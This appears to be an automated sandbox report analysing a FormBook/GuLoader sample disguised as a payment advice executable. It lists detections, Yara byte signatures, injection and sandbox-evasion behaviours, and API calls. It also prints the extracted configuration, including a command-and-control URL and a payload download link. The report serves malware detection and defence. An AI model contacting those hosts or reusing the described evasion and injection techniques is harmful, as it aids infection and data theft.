Play interactive tour

Edit tour

Analysis Report payment advice_mt103645367.exe

Overview

General Information

Sample Name:	payment advice_mt103645367.exe
Analysis ID:	387728
MD5:	e4f3fd2e517743504817b7c3e2032de3
SHA1:	b42b6607bef7562a38a55b1d74fbb6e5d91f8fcf
SHA256:	08673c97c9a0e20536ce90e162e7da11dde8d4bfc4c01cabe7d3baeafaf449e6
Tags:	exeFormbookInvoice
Infos:
Most interesting Screenshot:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Potential malicious icon found

Yara detected FormBook

Yara detected Generic Dropper

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Executable has a suspicious name (potential lure to open the executable)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses ipconfig to lookup or modify the Windows network settings

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

payment advice_mt103645367.exe (PID: 6236 cmdline: 'C:\Users\user\Desktop\payment advice_mt103645367.exe' MD5: E4F3FD2E517743504817B7C3E2032DE3)

payment advice_mt103645367.exe (PID: 2440 cmdline: 'C:\Users\user\Desktop\payment advice_mt103645367.exe' MD5: E4F3FD2E517743504817B7C3E2032DE3)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

ipconfig.exe (PID: 244 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 4856 cmdline: /c del 'C:\Users\user\Desktop\payment advice_mt103645367.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.healthpro.info/hwad/"], "decoy": ["atracion.digital", "abiraron.com", "pamelaklein.com", "ailingboli.com", "stclandhome.com", "lowcarbindulgence.com", "comedytournaments.com", "hervis.academy", "votestevecody.com", "medsdiscount.cloud", "pagenstechers.com", "itagamescraft.net", "321duang.com", "digitalmarketingjobsworld.com", "spsxhstar.com", "yhnbgtr.com", "018fee1.com", "weixiang168.com", "modernlifestylejournal.com", "nathapatilgroup.com", "crevelli.com", "dimeoohnique.com", "wikihighlight.com", "yetisotomotiv.com", "nobleclothingstore.com", "927703.com", "2251ferndell.com", "trackgram.net", "bbsunglasses.com", "sk202.com", "shqundu.com", "andersonandassociatesfirm.world", "edmcpng.com", "luxxebloomy.net", "229215.com", "royalbranchhomes.com", "xinjizf.com", "distributecourt.com", "peacefulprotests.website", "sumernight.com", "mybosscoffee.com", "kuppers.info", "presentfocus.life", "fxbplus.com", "todayshomily.com", "craicing.com", "condomon.com", "stopreflujo.com", "truebanditclothing.com", "miaosenmy.com", "aco-tabi.com", "jinling.love", "jobjiihnn.club", "shopzoning.com", "corridordaily.com", "revistaentropica.com", "bajavinofest.com", "wurmo.com", "reviewsbeforebuying.com", "bodi-massazh-dlya-muzhchin.site", "keystonenation.com", "odpuertorico.com", "consciouscommune.com", "omr-omr.com"]}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1aB-zaGqLPPqCYTSGciphPUjiOv8883KP"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000013.00000002.497327115.0000000003B17000.00000004.00000001.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x54b8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.495667904.00000000031B0000.00000004.00000020.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x5398:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Process Memory Space: payment advice_mt103645367.exe PID: 2440	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: payment advice_mt103645367.exe PID: 2440	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: payment advice_mt103645367.exe PID: 2440	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: ipconfig.exe PID: 244	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 11 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1aB-zaGqLPPqCYTSGciphPUjiOv8883KP"}
Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.healthpro.info/hwad/"], "decoy": ["atracion.digital", "abiraron.com", "pamelaklein.com", "ailingboli.com", "stclandhome.com", "lowcarbindulgence.com", "comedytournaments.com", "hervis.academy", "votestevecody.com", "medsdiscount.cloud", "pagenstechers.com", "itagamescraft.net", "321duang.com", "digitalmarketingjobsworld.com", "spsxhstar.com", "yhnbgtr.com", "018fee1.com", "weixiang168.com", "modernlifestylejournal.com", "nathapatilgroup.com", "crevelli.com", "dimeoohnique.com", "wikihighlight.com", "yetisotomotiv.com", "nobleclothingstore.com", "927703.com", "2251ferndell.com", "trackgram.net", "bbsunglasses.com", "sk202.com", "shqundu.com", "andersonandassociatesfirm.world", "edmcpng.com", "luxxebloomy.net", "229215.com", "royalbranchhomes.com", "xinjizf.com", "distributecourt.com", "peacefulprotests.website", "sumernight.com", "mybosscoffee.com", "kuppers.info", "presentfocus.life", "fxbplus.com", "todayshomily.com", "craicing.com", "condomon.com", "stopreflujo.com", "truebanditclothing.com", "miaosenmy.com", "aco-tabi.com", "jinling.love", "jobjiihnn.club", "shopzoning.com", "corridordaily.com", "revistaentropica.com", "bajavinofest.com", "wurmo.com", "reviewsbeforebuying.com", "bodi-massazh-dlya-muzhchin.site", "keystonenation.com", "odpuertorico.com", "consciouscommune.com", "omr-omr.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: payment advice_mt103645367.exe	Virustotal: Detection: 30%			Perma Link
Source: payment advice_mt103645367.exe	ReversingLabs: Detection: 19%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY

Source: 19.2.ipconfig.exe.3b17960.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 19.2.ipconfig.exe.31b0840.1.unpack	Avira: Label: TR/Dropper.Gen

Source: payment advice_mt103645367.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 216.58.214.225:443 -> 192.168.2.3:49727 version: TLS 1.2

Source:	Binary string: ipconfig.pdb source: payment advice_mt103645367.exe, 0000000A.00000002.486746256.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: payment advice_mt103645367.exe, 0000000A.00000002.486746256.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.473834732.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: payment advice_mt103645367.exe, 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp, ipconfig.exe, 00000013.00000002.496605344.00000000036FF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: payment advice_mt103645367.exe, ipconfig.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.473834732.000000000E1C0000.00000002.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.healthpro.info/hwad/
Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=download&id=1aB-zaGqLPPqCYTSGciphPUjiOv8883KP

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS traffic detected: queries for: doc-0g-3k-docs.googleusercontent.com

Source: explorer.exe, 00000010.00000000.474274647.000000000F5E6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000010.00000000.474142184.000000000F54C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.mY
Source: explorer.exe, 00000010.00000000.474142184.000000000F54C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000010.00000000.471647488.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: payment advice_mt103645367.exe, 0000000A.00000002.486789978.0000000000562000.00000040.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1aB-zaGqLPPqCYTSGciphPUjiOv8883KP

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727

Source: unknown

HTTPS traffic detected: 216.58.214.225:443 -> 192.168.2.3:49727 version: TLS 1.2

Source: payment advice_mt103645367.exe, 00000000.00000002.374597434.00000000006EA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000013.00000002.497327115.0000000003B17000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.490754854.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.495160513.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.486705428.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.495667904.00000000031B0000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: payment advice_mt103645367.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: payment advice_mt103645367.exe

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,	10_2_1E3E9A20
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,	10_2_1E3E9A00
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_1E3E9660
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,	10_2_1E3E9A50
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_1E3E96E0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,	10_2_1E3E9710
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_1E3E97A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,	10_2_1E3E9780
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9FE0 NtCreateMutant,LdrInitializeThunk,	10_2_1E3E9FE0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_1E3E9860
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,	10_2_1E3E9840
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,	10_2_1E3E98F0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_1E3E9910
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9540 NtReadFile,LdrInitializeThunk,	10_2_1E3E9540
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,	10_2_1E3E99A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E95D0 NtClose,LdrInitializeThunk,	10_2_1E3E95D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9610 NtEnumerateValueKey,	10_2_1E3E9610
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9A10 NtQuerySection,	10_2_1E3E9A10
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9670 NtQueryInformationProcess,	10_2_1E3E9670
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9650 NtQueryValueKey,	10_2_1E3E9650
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9A80 NtOpenDirectoryObject,	10_2_1E3E9A80
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E96D0 NtCreateKey,	10_2_1E3E96D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9730 NtQueryVirtualMemory,	10_2_1E3E9730
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3EA710 NtOpenProcessToken,	10_2_1E3EA710
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9B00 NtSetValueKey,	10_2_1E3E9B00
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9770 NtSetInformationFile,	10_2_1E3E9770
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3EA770 NtOpenThread,	10_2_1E3EA770
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9760 NtOpenProcess,	10_2_1E3E9760
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3EA3B0 NtGetContextThread,	10_2_1E3EA3B0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9820 NtEnumerateKey,	10_2_1E3E9820
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3EB040 NtSuspendThread,	10_2_1E3EB040
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E98A0 NtWriteVirtualMemory,	10_2_1E3E98A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3EAD30 NtSetContextThread,	10_2_1E3EAD30
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9520 NtWaitForSingleObject,	10_2_1E3E9520
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9560 NtWriteFile,	10_2_1E3E9560
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E9950 NtQueueApcThread,	10_2_1E3E9950
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E95F0 NtQueryInformationFile,	10_2_1E3E95F0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E99D0 NtCreateProcessEx,	10_2_1E3E99D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_00568170 NtProtectVirtualMemory,	10_2_00568170
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649A50 NtCreateFile,LdrInitializeThunk,	19_2_03649A50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649910 NtAdjustPrivilegesToken,LdrInitializeThunk,	19_2_03649910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649860 NtQuerySystemInformation,LdrInitializeThunk,	19_2_03649860
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649FE0 NtCreateMutant,LdrInitializeThunk,	19_2_03649FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036496E0 NtFreeVirtualMemory,LdrInitializeThunk,	19_2_036496E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649540 NtReadFile,LdrInitializeThunk,	19_2_03649540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036495D0 NtClose,LdrInitializeThunk,	19_2_036495D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649B00 NtSetValueKey,	19_2_03649B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0364A3B0 NtGetContextThread,	19_2_0364A3B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649A20 NtResumeThread,	19_2_03649A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649A00 NtProtectVirtualMemory,	19_2_03649A00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649A10 NtQuerySection,	19_2_03649A10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649A80 NtOpenDirectoryObject,	19_2_03649A80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649950 NtQueueApcThread,	19_2_03649950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036499D0 NtCreateProcessEx,	19_2_036499D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036499A0 NtCreateSection,	19_2_036499A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649840 NtDelayExecution,	19_2_03649840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0364B040 NtSuspendThread,	19_2_0364B040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649820 NtEnumerateKey,	19_2_03649820
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036498F0 NtReadVirtualMemory,	19_2_036498F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036498A0 NtWriteVirtualMemory,	19_2_036498A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03649760 NtOpenProcess,	19_2_03649760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0364A770 NtOpenThread,	19_2_0364A770
